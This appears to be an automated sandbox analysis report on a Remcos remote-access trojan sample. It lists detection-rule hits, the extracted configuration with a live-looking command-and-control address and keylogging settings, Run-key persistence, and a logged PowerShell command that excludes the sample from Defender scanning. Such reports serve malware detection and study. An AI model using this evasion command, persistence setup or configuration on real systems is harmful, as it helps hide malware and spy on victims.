Source: Process started; Author: David Burkett, @signalblur; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7328, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7412, ProcessName: svchost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Users\user\AppData\Roaming\Graias\graias.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4XYAW8PbZH.exe, ProcessId: 2816, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-O844B9
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4XYAW8PbZH.exe", ParentImage: C:\Users\user\Desktop\4XYAW8PbZH.exe, ParentProcessId: 6976, ParentProcessName: 4XYAW8PbZH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", ProcessId: 2536, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7328, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7412, ProcessName: svchost.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4XYAW8PbZH.exe", ParentImage: C:\Users\user\Desktop\4XYAW8PbZH.exe, ParentProcessId: 6976, ParentProcessName: 4XYAW8PbZH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", ProcessId: 2536, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7328, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7412, ProcessName: svchost.exe

Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: CC 5F EF 95 52 EC 1E E1 CA 3B DB 36 C6 90 98 6F F2 B2 EE 7D D9 55 DE 98 DA B0 14 BE 23 8B B2 A6 5E C6 CF 30 9C 82 F7 90 AE DF 71 5A C6 2D 2B ED 3E 5C 1B A5 E3 5D AE 39 5E 59 31 08 F4 CA E6 2B BA 34 A0 37 84 D9 A7 16 09 0E C6 14 B2 0C FB 58 78 BA B3 DF 78 0D 8C 08 09 07 A7 A5 D5 53 48 D3 1B 9D, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Graias\graias.exe, ProcessId: 7328, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-O844B9\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-04T18:41:57.412631+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 185.234.72.215 | 4444 | TCP
2025-01-04T18:41:58.049544+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 185.234.72.215 | 4444 | 192.168.2.4 | 49734 | TCP
2025-01-04T18:44:15.459474+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 185.234.72.215 | 4444 | 192.168.2.4 | 49734 | TCP
2025-01-04T18:46:15.509845+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 185.234.72.215 | 4444 | 192.168.2.4 | 49734 | TCP
2025-01-04T18:41:59.200663+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 178.237.33.50 | 80 | TCP


                AV Detection

                barindex
                Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": ["185.234.72.215:4444:0"], "Assigned name": "Graias", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "graias.exe", "Startup value": "Enable", "Hide file": "Enable", "Mutex": "Rmc-O844B9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Graias", "Keylog folder": "graias", "Keylog file max size": ""}
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe, ReversingLabs: Detection: 68%
                Source: 4XYAW8PbZH.exe, Virustotal: Detection: 59%
                Source: 4XYAW8PbZH.exe, ReversingLabs: Detection: 68%
                Source: Yara match, File source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR
                Source: Yara match, File source: C:\ProgramData\graias\logs.dat, type: DROPPED
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe, Joe Sandbox ML: detected
                Source: 4XYAW8PbZH.exe, Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_0043294A
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_7f932f94-f

                Exploits

                barindex
                Source: Yara match, File source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR

                Privilege Escalation

                barindex
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_00406764 _wcslen,CoGetObject,3_2_00406764
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0, HTTP Parser: No favicon
                Source: 4XYAW8PbZH.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4XYAW8PbZH.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Xml.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: Accessibility.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Xml.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdbxX source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdbX source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: mscorlib.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Drawing.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: mscorlib.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdbAccessibility.dllD source: WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.pdb4 source: WERE219.tmp.dmp.14.dr
                Source: Binary string: Accessibility.pdbMZ source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Drawing.pdbl source: WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.pdbP source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040B335
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,3_2_0041B43F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040B53A
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,3_2_004089A9
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,3_2_00406AC2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,3_2_00407A8C
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00418C79
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,3_2_00408DA7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00406F06
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, File opened: C:\Users\user\AppData\Roaming
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, File opened: C:\Users\user
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, File opened: C:\Users\user\AppData

                Networking

                barindex
                Source: Network traffic, Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49734 -> 185.234.72.215:4444
                Source: Network traffic, Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 185.234.72.215:4444 -> 192.168.2.4:49734
                Source: Malware configuration extractor, IPs: 185.234.72.215
                Source: global traffic, TCP traffic: 192.168.2.4:49734 -> 185.234.72.215:4444
                Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                Source: Joe Sandbox View, IP Address: 13.107.246.60
                Source: Joe Sandbox View, IP Address: 239.255.255.250
                Source: Joe Sandbox View, IP Address: 178.237.33.50
                Source: Joe Sandbox View, ASN Name: COMBAHTONcombahtonGmbHDE
                Source: Network traffic, Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49737 -> 178.237.33.50:80
                Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknown, TCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe, Code function: 3_2_00426107 recv,3_2_00426107
                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
                Source: 4XYAW8PbZH.exe, graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, 4XYAW8PbZH.exe, 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp~
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chromecache_283.17.drString found in binary or memory: http://schema.org/Organization
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1831640723.0000000002911000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000008.00000002.1856673299.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aka.ms/certhelp
                Source: chromecache_283.17.drString found in binary or memory: https://aka.ms/feedback/report?space=61
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aka.ms/msignite_docs_banner
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aka.ms/pshelpmechoose
                Source: chromecache_283.17.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
                Source: chromecache_283.17.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
                Source: chromecache_283.17.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://channel9.msdn.com/
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/Thraka
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/Youssef1313
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/adegeo
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://github.com/dotnet/try
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/gewarren
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://github.com/js-cookie/js-cookie
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/mairaw
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/nschonni
                Source: chromecache_283.17.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
                Source: chromecache_296.17.drString found in binary or memory: https://schema.org
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
                Source: chromecache_296.17.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50658
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 50781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50477
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50796
                Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50477 -> 443
